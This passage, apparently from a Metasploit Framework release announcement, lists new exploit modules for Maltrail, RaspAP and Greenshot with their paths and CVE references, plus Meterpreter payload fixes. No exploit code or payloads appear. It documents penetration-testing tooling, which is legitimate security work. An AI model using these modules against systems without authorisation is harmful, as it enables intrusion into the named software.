Description: This PR adds a module for an unauthenticated RCE vulnerability in Maltrail, a malicious traffic detection system. The module author indicated that this vulnerability does not have a CVE associated with it as the vendor (product team in this case) declined to assign one.

RaspAP Unauthenticated Command Injection

Authors: Ege BALCI and Ismael0x00
Type: Exploit
Pull request: #18263 contributed by EgeBalci
Path: exploits/unix/http/raspap_rce
AttackerKB reference: CVE-2022-39986

Description: This PR adds an unauthenticated command injection module for the RaspAP webgui application.

Greenshot .NET Deserialization Fileformat Exploit

Authors: bwatters-r7 and p4r4bellum
Type: Exploit
Pull request: #18253 contributed by bwatters-r7
Path: exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634
AttackerKB reference: CVE-2023-34634

Description: This PR adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.

Enhancements and features (1)

#18288 from adfoster-r7 - Adds stability enhancements to Meterpreter payloads. Additionally, this adds a large suite of automated sanity tests to Github Actions that verify OSX/Windows/Linux/Python/Java/PHP Meterpreter payloads work.

Bugs fixed (3)

#18275 from adfoster-r7 - Updates the module metadata for the Java reverse_http and reverse_https stagers to be treated as a dynamic payload size, instead of a static/fixed size. This size change can happen as the Java payload contains a user-configurable HTTP callback URL, and combined with the Zip compression present in JAR files - the overall generated payload size can change as a result.
#18278 from rorymckinley - Fixes a crash when running the auxiliary/scanner/mysql/mysql_login module against newer versions of MySQL.
#18289 from zeroSteiner - Fixes a typo in the exploit/freebsd/http/citrix_formssso_target_rce docs.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub: